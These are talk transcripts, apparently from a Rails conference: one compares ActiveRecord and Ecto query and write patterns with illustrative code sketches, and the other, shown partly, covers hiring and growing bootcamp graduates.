cat, a dog under that cat, you know, and that's called a leaky abstraction, that's the term for that, because you can't just use the abstraction without also understanding how it works. Which is why our Active Record's nice, English-looking syntax starts to kind of get a little uglier when we try to make the SQL right, you know? So concerning object-oriented programming, Joe Armstrong said about objects, you wanted a banana but you got a gorilla holding the banana. So we're running this query, right, we're getting data, data's the banana. What we got is this active record model, which is an object, and it's got all this like behavior mixed in. That's kind of the gorilla, you know? And that can be difficult to reason about sometimes when you start passing these models all around, all over the place, and you've lost track of the queries, and you've got this thing that's a gorilla holding a banana, and you really want the banana, and you end up calling the gorilla, you know? So it's interesting. So as I said, we got the queries here. You could use a join instead and make it into one query. But there's another performance problem associated with that. We fixed our N plus one, didn't we? But I think there's still a performance problem here. 
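Continuing the sketch from above (same assumed names), the preload fix described here would look roughly like this — one extra query for all the users rather than one per party:

```ruby
# app/models/party.rb -- the combined scope, now with the preload baked in
scope :for_conference_and_time, ->(conference, time) {
  for_conference(conference)
    .starting_after(time)
    .not_ending_before(time)
    .preload(:active_users) # batches the association load; no more N+1
}
```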
And that is, in my opinion, well, the select star, because, you know, normally in these tables, we've got a lot of stuff on these tables, including our timestamps, for instance, which I'm not even displaying on the page, but I'm pulling them back anyway, aren't I? Even, I'm pulling back a lot of stuff that I don't need. And active record kind of encourages us. I call this problem seeing stars, right? Seeing stars is this indiscriminate use of ORMs that's where it's always select star. And we can fix this, you know, by adding a dot select, but then you've got that ugly active record stuff with like the strings because we have to alias our tables and all that stuff. It's easy to fix, but it's also easy to forget about. You know what I mean? It's a pretty common problem I've seen in a lot of big Rails products is just select star everywhere because people don't take the time to do selects. And if you realize also, part of those scopes, those scopes are supposed to be reusable, aren't they? But once you start reusing scopes, each scope, each time you reuse it, each time you reuse it, might have different columns selected. So you're reusing a scope in like from one model, but you're tacking on different select statements and other parts and that all of a sudden also becomes real. Hard to keep track of like what's querying what because you've got a query spread out across so many files. So just to sum it up like sort of the Rails active record philosophy here is that kind of favors English over SQL, right? We have extracted away the SQL, which is good for readability, good English. Rails active record reads really beautifully. We've got objects, not data. We've got gorillas with bananas. Domain models over relational models. So domain model, like it just means like we've got a class that represents something in life. So I had a party table, like a party is a real thing, a user is a real thing, a conference is a real thing, and our classes match those. Our classes match like real world entities, things that we actually have to think about in real life versus a relational model which is tables which is specific to the database, which is a more computer oriented thing, less of a real world thing. Rails is big on productivity. If you've been in the Rails community long enough, you've heard about the 15 minute blog, right? It allows you to develop things really, really, really fast which is if that's what you need, then that's a great feature. It's awesome. It's tough on scalability because it's so easy to do those N plus ones and forget because it's so easy to forget about the select. There are a few other performance related things that I'll talk about later. I kind of favor developers over DevOps. Why do I say that? Well, because a lot of times like your DevOps or your DBAs are looking at the query log and it's like, oh, wow, look at last night, this was the slowest query that ran. Look at this giant thing. Where's that query? The developers are like, oh, well, it's split across 12 scopes over four different models. I kind of all chain together. It makes it hard if you just want to find the slow query, right? Find that query. It's kind of tough to track it down sometimes. The SQL in Rails, like, are they really friends? I don't know. They're kind of frenemies for that reason, I think, just because it is hard to think in SQL and also think in Rails, you know? So this is what I see at scale when you get huge active record applications. 
A lot of people using these N plus ones, the seeing stars problem, app level constraints. Those are things like unique constraints in the model, which is this weird kind of anti-feature, I think, that it's not safe against race conditions. I see, you know, the way in active record, you can just, like, take a model and, like, dot save kind of everywhere you want. You know, it seems like people forget transactions a lot. It's lazy, right? You string this query together and you pass something off. You can pass it all the way to the view before you start looping through it before it actually runs the query. So it's hard to keep track of where the actual query is run. Where Java championed forcefully protecting programmers from themselves, Ruby included a hanging rope in the welcome kit. This is DHH. And that's kind of true in Rails and Active Record, too. It allows you to get things done fast. But to its credit, great English-like readable DSLs. It's conceptually simple. It's comfortable for beginners. You know, it's kind of, if you're not really used to SQL, it's really easy to get started. So it's got these big thumbs up, you know, it's got its benefits, too. And overall, I'd say active record, this is my opinion kind of, but convenience over explicitness and performance. So it's real fast and easy and convenient to create, to kind of chain these scopes together. But that explicitness that like, here's what's actually happening, here's that SQL that's running, is lost a little bit. And it's easy to make performance mistakes. Explicitness, by the way, ding, ding, ding, that's our word of the day. I'm going to be saying this a lot today. So look out for this word. So let's move on to Ecto now. So Phoenix is not Rails, as Chris McCord said. And Leah Chalade says Rails and Phoenix are web frameworks that share a common goal. So they are and they aren't the same thing. They're very, very similar. If you're doing like, if you're doing like sort of like a crud app kind of thing, they are very, very similar. But then Ecto has, or Phoenix has this like superpower of real time communication. So if you're doing that, then they're very different, of course. But the way that Ecto works is it's a lot, it's a little different. So there's not just a simple model. There's a model file, but there's not a model class. It actually has four things, a repo, a schema, a change set, and a query. So already, it's conceptually a little more. There's more to think of, right? So here, for instance, is the first thing is the schema, right? So in the model file for party, it's got a model file, but not a model class. So first of all, you have to define the schema. We know that in ActiveRecord, you don't define the, you don't pre-define the fields, right? It's all dynamic. In Ecto, you actually have to define them. But you can see it's got has many and belongs to in the same kind of way. But it's explicit, right? So there's that word, explicit, because we're telling Ecto what fields we have, which allows us to do some, it turns out to be convenient. It's a little more boiler plate, but it turns out to be convenient. Here's our controller. So that first line is kind of weird. So for our index action, the connection, that has the, like the request and response and stuff. It's getting, it's passed in. It's not global, right? There, again, is that explicitness. That little funky thing with the brackets in the first line there, that's a, like a, it's a pattern matching. 
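The Elixir code isn't included in the transcript, so here is a hedged sketch of the schema and controller being described; module names, field names, and types are assumptions based on the HallwayTrack app the talk walks through:

```elixir
# web/models/party.ex -- field names and types are assumptions
defmodule HallwayTrack.Party do
  use HallwayTrack.Web, :model

  schema "parties" do
    field :name, :string
    field :start_time, Ecto.DateTime
    field :end_time, Ecto.DateTime

    belongs_to :conference, HallwayTrack.Conference
    has_many :users, HallwayTrack.User

    timestamps
  end
end

# web/controllers/party_controller.ex -- conn is passed in, and the params
# map is pattern matched right in the function head.
defmodule HallwayTrack.PartyController do
  use HallwayTrack.Web, :controller
  alias HallwayTrack.{Repo, Party}

  def index(conn, %{"conference_id" => conference_id}) do
    parties = Repo.all(Party.for_conference(conference_id))
    render(conn, "index.html", parties: parties)
  end
end
```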
It's kind of destructuring, getting the conference ID out of the request hash. And then we have repo.all. So repo is this module that represents our database. And we're passing party.for conference, which is what gets our query. So it's kind of two pieces. So we've got a repo that represents our database. And then we're party.for conference, returns the query. And so then they get run. And then we're explicitly calling index.html and passing it the parties. So it looks kind of like Rails, but a little more explicit. And we've got kind of two parts to our query instead of one. We've got a repo and we've got this for conference, which returns a query. If you're big on, like, design patterns and stuff like this, this is called the repository pattern. Martin Fowler defined this in one of his books here. Versus the active record pattern, an object that wraps a row in a database table or view. So active record pattern, like the original definition, kind of describes, like, the instance methods on active record. But active record, the Rails thing, is actually sort of like a melange of, like, like the class methods are more like repository, where the instance methods are more like active record, and there are hints of Data Mapper and other things mixed in there. So well, active record is sort of this, like, meta pattern that's kind of grown over time to encompass more and more. The patterns in Ecto are a little more finite. I actually was lucky enough to be on the RubyRogues podcast and Avdi Grimm was on there. And we were talking about this and someone said, hey, will someone define active record and repository? And I went and defined them and I got it totally wrong. He was like, actually, Brad, that's the opposite of what they mean. So this is, so if Avdi's in here, this is for you, I wanted to show you that I got this right. But what's also interesting about Phoenix is that, well, it has no save method. And so you can't just, like, query something, change a field and hit save and, like, save it back. I'm going to get to writing in a second. But, and it doesn't return objects, it returns structs. So it's returning bananas, not gorillas. It's just returning data in this sort of struct that you throw around that doesn't have methods hanging off of it. And then it's immutable. Those structs come back, they're immutable. You can't, like, change them once they're there, they're there. Which means you have to, like, design your programs a lot different, differently. Interestingly, it returns structs, not objects, right? Which means it's not an object-relational mapper. I'm a little bit embarrassed to say I didn't quite figure that out until after I had proposed this talk. The title is A Tale of Two ORMs, right? One's not actually an ORM. Whoops. But that's okay. They, they serve the same function. Okay. So here in the model, I, I need to put together a query, right? So here's my query for conference. I pass in a conference ID and I've got this cool syntax from party in Party. So I'm getting a little alias there. Where party.conference_id. And then also check out, check out the select. Select party.name, party.startTime, party.endTime. What's, what's kind of cool is if you get in your mind, well, for one thing, this really looks like SQL, doesn't it? The select's on the bottom instead of the top. But it looks, it looks really SQL-esque, doesn't it? It's almost like, it's almost like SQL written in Elixir, which is like kind of cool. 
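Roughly, the query being described would look like this in the Party module (a sketch, not the speaker's slide; the ^ pin operator, required by Ecto to interpolate outside values, is implied even though the talk doesn't call it out):

```elixir
import Ecto.Query

def for_conference(conference_id) do
  from party in HallwayTrack.Party,
    where: party.conference_id == ^conference_id,
    select: %{name: party.name, start_time: party.start_time, end_time: party.end_time}
end
```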
And then also the select syntax is really nice, much prettier than the Rails one. And if you get in the habit of always putting that in like you're writing a query, it's, it's, you're not going to forget it as easily and, and have the seeing stars problem, are you? If we want to preload, like, users, we can, just like that. It's still pretty SQL-esque looking. If you want to group by, I thought this was kind of cool. We have that group by, oh, that's just the user ID, sorry. But then select party.id and count of user.id. I thought that was kind of cool. Real SQL looking. Maps real nice. Does anyone know where they got this syntax from? Actually, this idea of this kind of like SQL looking syntax inside the code. It actually came from C sharp.net,.net MVC. It's, it's a rare case of like an open source world taking a cool idea from Microsoft, right? Instead of the other way around, instead of vice versa. Yeah, feels like, yeah. Yeah, nice, nice dance moves, Bill. Where'd you learn that? Yeah, we're still mad about IE6, you know. So in the end, I take all these queries and I sort of put them together all in the same file. Realize those are the ones I just showed you, but you know, there they are and it's kind of like a bunch of SQL queries. Now, you can write this in a way that kind of composes them and reuses them, but it's not very dry because they all three have the same wear condition. In an active record, you would make a scope and you'd reuse it. It'd be more dry. Here, we're repeating more stuff and this is a little bit more of my own opinion than something forced on you by, by Ecto, but there is some merit to that, right? Because, you know, it's real easy to track down those queries. It's real easy to find them, you know, when you look in your query log. You know, here's the one that, that locked this table last night. It's real easy to go back and look at them. You know, it's real easy to imagine this, to go from Ecto back to SQL and back again without sort of getting lost in all these model chaining, all these scopes together. So, also, so like if I ran this in the, Phoenix has a console like Rails, so if I run this in the Phoenix console, I get parties, I get all the parties, right? And then I get the first one, notice list.first of parties, that's a, we're functions, not methods, right? It's not parties.first. It's list.first.parties. It's a function and I do first party.users. I get this association not loaded. In, in, in ActiveRecord, this would be an ActiveRecord relation and it would actually load it, wouldn't it? It would actually run another query. You can't do that in Ecto. You can't do it. That's a null object that, that, it, for one thing, this is immutable, so it can't just load the new stuff in. It can't run another query and load stuff into that object because it's an immutable object anyway. But this solves the N plus one problem. You cannot do it. It's impossible to write an N plus one in Ecto. Now, that means you have to sort of go back to the model error and think ahead and write your preload back down there but, you know, which is a little more boilerplate and a little less dry but that might be a good thing. It's, it's, it's eager too. It's not lazy. So all the querying is actually done in the model error, you know. There's not that sort of laziness where you're passing this ActiveRecord thing all the way up to the view or God forbid the view helper and then like running it in a loop and then firing off a query, you know. 
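For reference, a hedged sketch of the preload and group-by queries described above (same assumed module and field names); because there is no lazy loading, forgetting the preload gives you an `%Ecto.Association.NotLoaded{}` placeholder rather than a silent N+1:

```elixir
def for_conference_with_users(conference_id) do
  from party in HallwayTrack.Party,
    where: party.conference_id == ^conference_id,
    preload: [:users]
end

# A grouped count, close to the group-by example described above.
def attendee_counts(conference_id) do
  from party in HallwayTrack.Party,
    join: user in assoc(party, :users),
    where: party.conference_id == ^conference_id,
    group_by: party.id,
    select: {party.id, count(user.id)}
end
```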
I've seen big Rails projects where it's like, okay, I'm going to look at the queries this, this, this request runs. Oh my gosh. There's one in the model, one in the controller, one in the view and one in the helper. Oh boy. This sort of forces it all to be at the model layer and you're forced to think ahead of all your preloads and stuff. It's not going to like randomly fire one off in the view. So now onto writing, right? When you write whether that's an update or an insert, we've got these things in Ecto called change sets. So here's a change set like for creating a new user, right? I know that I define this change set. I'm going to, it's going to take the name, the email address and the age. Cool. So that might be like your form that, you know, your, your sign up form, for instance. Okay. And this is what it looks like. That funky little arrow thingy that's called a pipeline operator. It's kind of like a Linux pipe. It's an Elixir thing. But look closely at this. First of all, there's actually like explicitly casting, right? Rails automatically casts. Ecto explicitly casts. And it's got required and optional params. We explicitly do the validations right here on this method and then we tell Ecto that there's a unique constraint on email. So that's one change set for like your sign up form. If we want one for like update, say you just update someone's email, we have to make another change set. We don't share the change set. So the top one is an insert operation. The second one is an update operation, two completely separate change sets. So contrast that, for instance, with an active model, an active record model. You know, you can kind of just like freeform it, like set a property and hit that save or set a couple properties and hit that save. You know, you can't do that here. It's like you have to explicitly define each write operation. This one's an update and it looks like this. It has these validations. This one's an insert. It looks like this. It has these validations, which is more explicit. There's that word again, right? Ding, ding, ding. Explicit. And also you can allow these to have separate validations. So you don't end up with a lot of like convoluted if statements on your validations and stuff. A little more boilerplate to set all this up, a little more work. But increased explicitness, increased flexibility and having multiple different sets of validations and things like that. So definitely a different approach. And it has this cool concept called a multi, where a multi is basically a bunch of ops, inserts or updates. So here we've got three. I've got a topic insert, a party insert, an update conference. And then you kind of wrap these in this transaction and you can get the, you can pattern match on the result, ok or error, and handle the result as a whole, right? This is kind of cool because if you get in the habit of using these, so like every time I have a post, I'm going to do my writes in a multi, then you never forget to wrap that in that transaction. Very common mistake I see in big Rails apps is the saves are kind of scattered all over the place and it's real hard to sort of wrap them all in one transaction or people just forget to wrap them in a transaction. This kind of helps you with that. And it's a little cleaner too. In Rails, you'd have to do like if topic.save and party.save and conference.save, here you just kind of create this multi and you save it and you get either an okay or an error. 
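A sketch of the two separate changesets and the multi being described. Field names and validations are assumptions; the talk's slides used the older cast signature with required and optional argument lists, while this uses the longer-lived cast-plus-validate_required style:

```elixir
def signup_changeset(user, params \\ %{}) do
  user
  |> cast(params, [:name, :email, :age])
  |> validate_required([:name, :email])
  |> unique_constraint(:email)
end

def update_email_changeset(user, params \\ %{}) do
  user
  |> cast(params, [:email])
  |> validate_required([:email])
  |> unique_constraint(:email)
end

# Grouping several writes into one database transaction with Ecto.Multi:
alias Ecto.Multi

multi =
  Multi.new
  |> Multi.insert(:topic, topic_changeset)
  |> Multi.insert(:party, party_changeset)
  |> Multi.update(:conference, conference_changeset)

case Repo.transaction(multi) do
  {:ok, results} -> results                              # all three committed
  {:error, step, changeset, _done} -> {step, changeset}  # everything rolled back
end
```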
So you're thinking transactions now instead of models and domain models, right? You're thinking in terms of, this is a single database transaction. So yeah, separate validations, a little more explicit, better security also, we're not, we don't have to deal with, we don't have to worry about the problem of strong params. You know, there's less text passing around, so less opportunity for SQL injection because it's got a better query syntax really. And again, explicitness. Functional programming is about making the complex part of your program explicit. In most web apps, the complex part, you know, is a lot of this database querying and how you're sort of translating from that user input and like shaping the data and getting it into the program or how you're taking that relational data, querying it, mixing and matching, turning it around, reshaping it and passing it out to the view. So Elixir makes that a little more explicit, right? A little easier to track down and figure what's going on, like at a slightly lower level, at not high, as high of an abstraction level. So also if you're big into big terms, Ecto follows the command query responsibility segregation principle, which is that read and update use two different models. And we saw that. The queries I had had joins in them, right? But the updates have these explicit change sets. It's not like one model for reading and writing. It's a separate thing, a query for reading and a change set for writing. So that's conceptually interesting, but it's also, there's also kind of like right at the database level kind of a real compelling reason to do that. Think about a query, you know, in anything non-trivial, a query is going to have joins. A query, most queries like in any, in big complex apps have a lot of joins. And when you get that, you get back a certain set of columns that does not match what's actually on the table. You're getting back columns from multiple tables. So your queries have a certain set of columns based on what joins they have, but your writes don't have joins, do they? The writes always write only to a single table at a time, an insert. An insert only inserts into a single table. An update only updates a single table, but your reads read from multiple tables. Yet, for instance, in Rails, they're sharing the same model. The fact, even though they're pulling back different data, different sets of properties, they're sharing the same model, we have that responsibility segregation here in Ecto. So they read and update using totally different paradigms, totally different sets of columns, totally different, you know what I'm trying to say. So just to kind of like sum up, Rails has objects, Phoenix has data, right? It's gorillas of bananas versus bananas. Rails has methods, whereas Phoenix has functions. And then Rails stuff is mutable. You can pull back an object, change a property, pass it around, do whatever you want with it. Phoenix is immutable. Once you query that data, you've got that struct. It doesn't matter. On the SQL level, or I guess at the ORM level, Phoenix or Ecto, right, it favors SQL style syntax over English style syntax. It looks more like SQL. It feels more like a relational database. Overseeing stars, I won't say it solves that problem. It definitely doesn't. But I feel like with that kind of cool select syntax and the way it kind of, you know, it looks like SQL, you have that query. 
I feel like it makes it a little easier to remember, not to just indiscriminately select star every time, which, you know, if you're not at scale, it may not matter. But at big scale, when you've got, you know, dozens of web servers firing on a single database server, the database server becomes your bottleneck. And those select stars are a performance killer. Rails is lazy. Ecto is eager. All those queries kind of fire when you'd expect them to. You know, we're not passing these lazy objects off to the views where the SQL then gets fired from the view. Rails is dispersed. The query gets spread around across scopes, across multiple files. Where in Ecto, it's more confined. It's all in that model layer. So what's the downside of this? Well, it is more boilerplate. We have to set up all those change sets. We have to define our schema. We have to create those multis and stuff. There's more typing involved. You know, you're going to end up with more code to kind of set that stuff up. It's a little bit more complex of a mental model because, you know, in the world of ActiveRecord, we've got domain models. Oh, I've got a user. That's a real life thing. I've got a user class. You know, a nice easy connection there to think about. Whereas this is more complex. That command query responsibility segregation means I've got to think about this differently when I read than I do when I write. It's less dry. We've got more repeated code because we're reusing it less. A little less readable. That depends what you're used to, you know. If you want code that looks like English, you know, if that's what you're used to and that's how you like to code, then it probably will be less readable. If you're used to SQL and doing things like this, you know, and writing queries, then, you know, you may have the opposite experience. It may be a little more readable. It's like, it's kind of like robot talk, you know, instead of like users and conferences, we've got change sets and schemas and queries. But that might be more natural if you're used to like talking in computer terms. I like talking in SQL, for instance, my wife's like, Brad, will you do the dishes? I'm like, select dishes from sink, insert into dishwasher. She's like, what are you saying, Brad? I'm like, oh, sorry, sweetie, I was talking SQL. She's like, you are so weird. But then, right, so we get, I guess the tradeoff here is sort of the opposite. We've got like, it's explicitness, there's that word, right? It's explicit what we're doing. Performance, there are, I won't say it's better performance. I'm saying there are fewer caveats, right? Fewer pitfalls that you can fall into. You still have to be mindful, of course, but there are fewer pitfalls you can fall into for performance. You can't do N plus ones, you know? Over convenience, it's not quite as fast to develop. I wouldn't want to do the 15 minute blog in Phoenix, but you know, I bet you could do it in 30, you know? So it's just a different set of tradeoffs. And that's really what this is about, is that neither of them are better or worse. It's just a different set of tradeoffs you get with these different designs. Also, part of the actual philosophy is just to sort of like, let the database do what it's good at, you know? It adds constraints by default in your migration. If you set up a foreign key with references, you get that constraint by default, you know? 
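As a rough illustration of letting the database do what it's good at, an Ecto migration along these lines puts both the foreign key and the uniqueness rule in the database itself; table and column names here are assumptions:

```elixir
defmodule HallwayTrack.Repo.Migrations.CreateUser do
  use Ecto.Migration

  def change do
    create table(:users) do
      add :name, :string
      add :email, :string, null: false
      add :party_id, references(:parties) # a real foreign-key constraint

      timestamps
    end

    # Enforced by the database; unique_constraint(:email) in the changeset
    # just turns the resulting error into a friendly validation message.
    create unique_index(:users, [:email])
  end
end
```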
It does not have polymorphic associations like Rails, which if you come from the world of SQL like I did before, getting to ActiveRecord, yeah, that is just so weird. I don't know where that pattern came from. It does not have these app level unique validations, you know? Like so Active, if you want a unique validation, you put it on the database. It doesn't have that like application level one where you can do unique validation in Rails. That one is weird. It runs a select query first before doing the insert. It's not safe for race conditions. So you can't do that. And it's kind of clever like Ecto has some neat ways. The downside of relying on the database is that the error message is uglier, but Ecto has some neat ways around that. I don't know if you remember, but in the change set, I defined unique constraint on email. When it gets like a unique constraint failure, it says, oh, which one is the unique column? Oh, it's email. Let me generate a nice error message for you. So it's really clever. And then there's the testing story, you know? I don't have any slides, you know, about the testing code, but believe me, the testing ends up being easier when you've got this more explicit model when you're passing just data around between your functions. You tend to do less mocking because your business logic is not sort of like mixed into the model. You're not sort of like blending together business logic. So like say you have this financial app, you might have like calculate_interest_rate or something. That's not in the model. It's a function and you're taking the data, running the query, taking that data, passing it into that function, getting a result back. Well, that function then becomes really easy to unit test. It's a pure function. That's one of the benefits of functional programming. So just sort of the way you're forced into this paradigm, a slightly stricter paradigm with Ecto, you end up with more pure functions. You end up with less stubs and mocks, which is really nice. Also because this runs on Erlang VM, the test runs are massively concurrent. You fire off like the test suite and it starts up like 30 at a time, like in parallel, which is really awesome. It does have more cool features, like JSONB, that's that thing in Postgres where you can save JSON in Postgres and query against it. It's got support for that in a real slick way and they say there's a Mongo adapter coming, which is kind of cool. You can also take Ecto and like supply your own adapter for it. So someone like, someone found a way to write an adapter that hits the GitHub API. So it's Ecto, but instead of reading from a database, it's hitting the GitHub API and you get that same SQL type query. That's kind of cool. If you wanted to like swap out a database implementation with an API implementation or vice versa, you get that same, you don't have to change any of your app level code, which is kind of cool. That's kind of neat. But in the end of this, realize that ORMs are a choice that you get trade offs with each one and one size does not fit all. So obviously I think I've shown, this is completely unbiased, right? I see these frameworks as, no, I like to act away, but that may not be for you and that's okay if you value the kind of convenience that it gives, then this will be it. And also realize you have a choice, even if you're stuck with Ruby, you know, there's another gem out there called Sequel, which has some similarities with Active Record, but with also a different set of trade offs, you know. 
It doesn't have the N plus, I don't think it has the N plus one thing, you know. So it's, you can, you can swap this out in your Rails app, use the ORM of your choice. Trailblazer, another one, which actually uses Active Record, but it's got like an application architecture on top of that, including something that looks a lot like Ecto's change sets. So, you know, again, different trade offs if you want to use this. You can also use Active Record in a way that looks more like, you know, some of these other design patterns, more like Ecto if you want to, maybe by adding a service object or something, or you may just use Active Record as it is, just realize that, you know, just because you're using Rails doesn't mean you're forced into the Active Record way necessarily. So a few resources here, a couple great articles. The Bike Shed podcast with José Valim is awesome, that's really, really good. If you're interested more in immutability and those, immutable data structures, those persistent data structures, this is Changing the Unchangeable, that's a talk I gave at RubyConf, which explains not just why, but how those things work. And then if you're interested more in like services, and how you can like change the way you use Active Record, I also gave a talk at a meetup in Santa Barbara, which is, and there's a link to that one for you. If you're more interested in Phoenix, check out Friday, Brian Cardarella, he's the CEO of DockYard, he's giving a talk just on Phoenix. I haven't seen it yet, but I'm betting it's pretty good. Who am I? My name is Brad Urani, I tweet at Brad Urani, follow me, I'll follow you back, I'm really a Twitter addict. Connect with me on LinkedIn, I've got this blog, I don't update it very much. I work in Santa Barbara at Procore. Procore makes construction management software, it's an incredible place to work. This is the view from our office, you can whale watch while you program. It is one of the coolest places to work, it's the coolest place I've ever worked. I moved all the way from St. Louis, Missouri to Santa Barbara just to work there. We're hiring like crazy, Rails Architects, JavaScript front end, which is React and Redux, pretty much every cool thing you could think of. I'd love to talk to you about that if you're interested or there are also about 15 of us here mostly wearing Procore gear, so come and talk to any of us. Finally, HallwayTrack, the app is live, if you would like to use it, right, to get together with your fellow programmers here and set up a little HallwayTrack meeting, it's really raw, but it does work. You do have to wait for that Heroku spin up time when you load it the first time, so be patient. But it is live and it does work. Any questions? Oh, you mean the double incarnate? Yeah, those don't exist in Ecto. You asked about callbacks. Do callbacks exist in Ecto? No, I don't think they do. If they did, I didn't go looking for them. There are other ways to solve that problem, right? You might put a service layer or do it in the controller where you run everything in that, I showed you that multi where you're kind of doing all the rights in one multi. You just use the controller or a service layer to kind of put stuff in a multi and run it all at once. Cool, thank you very much.
|
They bridge your application and your database. They're object-relational mappers, and no two are alike. Join us as we compare ActiveRecord from Rails with Ecto from Phoenix, a web framework for Elixir. Comparing the same app implemented in both, we'll see why even with two different web frameworks in two different programming languages, it's the differing ORM designs that most affect the result. This tale of compromises and tradeoffs, where no abstraction is perfect, will teach you how to pick the right ORM for your next project, and how to make the best of the one you already use.
|
10.5446/31497 (DOI)
|
I think we'll go ahead and get started. I know folks can catch them up. Still okay, sound-wise? A little louder? How's that? Better? Projecting? Cool, so that's good. And I did turn off flux. Excellent. All right, so first, yes, flux is off. Second, thanks so much for coming. I really appreciate you all taking the time to come and see me talk. Thank you to RailsConf for agreeing to let me talk. Thanks so much to Kansas City for hosting all of us. So yeah. Yeah, some applause for Kansas City. All right. Excellent. Cool. So hello. Hi. I figure this is a computer talk, so we have to start with zero, right? So part zero. Thanks. I tend to speak really quickly. So if I start going way too fast, I talk fast when I'm excited. I get excited talking about Ruby and about hiring and about boot camps and about all this stuff. So if I start to go way too fast, just something, just like wave your arms or maybe dial it back, some kind of large gesture that I'm likely to see to sort of slow me down and help you guys follow along. I'm going to talk for about 30 minutes, maybe a tiny bit more. We'll have about 10 minutes at the end for questions. I'm going to try not to just plow through this talk. It's funny, a little bit ago I did a talk on Ruby Garbage Collection, and I felt good about the talk and I practiced it and I was in a good spot. Then right before I started, Matt's came in and sat down in front row center, so I got to teach Matt's about Ruby Garbage Collection, also half through the Ruby Core team. So I did this talk pretending that all of you would be Matt's or practiced it rather, and it seems that none of you is. So I hope I'm in a good spot and that, like I said, that I would just kind of truck through this talk. So I'd ask you just to stretch one arm. You can go ahead and just raise one arm. There's going to be a little bit of interaction. Not a lot. I know we hate that. So I'm going to ask you to other arm too, just in case you decide to switch it up. I'm just going to ask you to raise your hands at some point in the presentation, the show, and that's going to be the extent of the audience participation. So like I said, hello. My name is Eric Weinstein. I work at Hulu as a senior engineering lead. You can find me on GitHub, Twitter, et cetera, et cetera, in this human hash that I made. If you like Ruby, and I imagine you do, or you wouldn't be here, there's a book I wrote a little bit ago called Ruby Wizardry that teaches Ruby to eight, nine, 10, 11, 12-year-olds. It's available from NoStarch, so thank you also to NoStarch. They've gone ahead and given us 30% off coupon promo code. So anytime this week, go to NoStarch.com. If you do want to pick up a copy of Ruby Wizardry, physical or E, just use RailsConf 2016, and that will be 30% off. So again, thanks to NoStarch for that. So like I said, this talk is pretty quick, but I think it's still beneficial for us to sort of know where we're going. So this is a kind of quick overview of what we'll be talking about with the obligatory clickbait, right? So where are we going? You know, that one big mistake we keep making at one weird old tip, et cetera. There'll be kind of a survey of the field. We'll talk a little bit about different boot camp programs and sort of what they offer and what one learns in a boot camp. Really what we should be looking for when interviewing boot camp graduates. This fourth one is super important. I believe it's kind of like going to be the running theme of this talk. It's belief in improvement. 
If you don't believe that you can get better at math or programming or interviewing or X skill through deliberate practice and dedication, you're not going to. So I think that believing in improvement and then promulgating that as part of our culture, that we believe in improvement, is huge. And finally we'll touch on kind of a holistic model for continued growth, right? We will talk about interviewing and then, once we've got folks in the door, how we help them continue to learn and to grow as part of the organization. So part one, we've cleared part zero. We're on the second part now. Part one, hiring, right? I think the crucial thing is we sort of lost the thread a little bit ago in terms of interviewing, where we have confused the product for the process, and I'll talk a little bit more about what I mean by that. But essentially what we're looking for, right, is when we want to hire someone, we want to say, hey, abstractly, whatever it is that you know how to do, are you good at that thing? Right? Whatever it is we're hiring for, whatever it is we need, are you good at doing that thing? And to some extent we've confused that with concretions, with ideas of what we think people should know, and not generally stepping back and figuring out whether our needs are being met, instead kind of like looking at this particular example, and we'll talk more about it. And it's kind of steeped in interviewing tradition, so we'll talk a bit about that as well. So we're on to the first arm exercise, right? I warned you about this. How many of you have attended a boot camp or something that could be described as a boot camp or a retreat or something like that? Cool. Or worked with someone. Or have hired someone. Or have had some kind of meaningful interaction with a boot camp. Okay, so a lot of you. Excellent. That's good. So this talk is kind of a lie. It's not entirely about boot camps. It is, in fact, kind of a larger talk about hiring generally and the sort of confusion in terms of hiring and growing generally. And it's sort of through the lens of boot camp programs, A, because they're very popular. It's sort of a trending topic in the community now. B, it just provides us focus to talk about a particular non-traditional route as opposed to kind of the abstract non-traditional background entirely. And well, see, I guess it's not even really a lie. It's more of a fib. It's about hiring and growing. Everyone, not just graduates of boot camp programs. Am I good on pace? Does this sound like a good, relaxed pace? Excellent. Cool. I guess I'm going to try to dial this back just a tiny bit. So what is the traditional experience, right? I think it's computing science, which is not a typo. It turns out Dijkstra called it computing science. And I sort of like that, because when we call the tradition computer science, it's sort of like we understand computers, right? And everybody knows that computers are actually tiny, non-deterministic boxes of feelings that do what they want. And no one actually really knows how they work. It's a deep mystery of the universe. So we, I think, should call it computing science, because really when someone majors in CS, they look at compiler design, they look at computation, they look at algorithms, data structures. There's some writing code sometimes. That's the thing that you sometimes do. But that's really what we're talking about when we talk about a traditional background.
Four-year degree in computing science, learning things like graphs and trees, whiteboarding, a lot of whiteboarding. And then a language like Java or C++, right? A language that you would be taught in school, a language that is the sort of lingua franca, if you're looking at preparatory stuff like Cracking the Coding Interview, things of that nature. And so this is that click-baity thing. I talked about this one big mistake that we've made. And like I said, somewhere along the way, we've sort of confused this abstraction. Are you good at this thing that you know how to do? Are you good at this thing that we need? But this concretion of, given that the thing you do is computing science, are you good at it? And we sort of punish people who aren't. Or we kind of snipe, look for weaknesses in people who are not good at computing science or have not studied computing science. Fundamentals are important. That's why they're fundamental. But there's something that we should really pay attention to when we're interviewing, which is, are we looking for someone who is really good at computing science or are we looking for something else? Because if we're looking for something else and we're hiring someone with that skill set while we're interviewing for someone who, and this is another theme in this room if you've been in here earlier today, is super good at red-black trees, right? That is a different thing than most of what we do day-to-day, programming Ruby, programming Rails. And all we're going to do if we ask someone these kinds of questions who comes from a boot camp or a non-traditional background is just make them feel bad that they don't know how to write a red-black tree from memory. So these are, this is the survey of the field that I promised you. It's just the ones that I'm most familiar with. There's nearly 100 in North America alone, so I've just picked these six. These are ones that I know have Ruby and Rails in their curricula. So we've got App Academy, Dev Bootcamp, the Flatiron School, General Assembly, Hack Reactor, and Turing School. So we're going to talk a little bit about these programs generally and get a sense of what the curricula are, what's taught, and guide our interview process from there. Sort of an NB, I attended Hacker School three years ago, which is now called the Recurse Center. I don't know if it's really a boot camp in the traditional sense insofar as, you know, there's no curriculum. You can be doing Python for three months. You can be doing C++ for 20 years and be taking your open source vacation. You have all these 30-odd people, these hugely disparate backgrounds in a room, programming together for three months. It is a non-traditional route though, so I thought I'd mention it because we're about non-tradition in this talk. So what do we learn in boot camps? It's not computing science, not generally. We learn things like Ruby and Rails. The curricula do vary from camp to camp, but we can talk, I think, in meaningful generalities. So there's server-side stuff like Ruby and Rails. There's client work in JavaScript, of course, because we are cursed with JavaScript. It sort of depends on what framework. So some will teach Angular, some will teach React, but there's some JavaScript, there's some client-side component. This is a full-stack type of experience. So that also means that we learn software development tools and best practices.
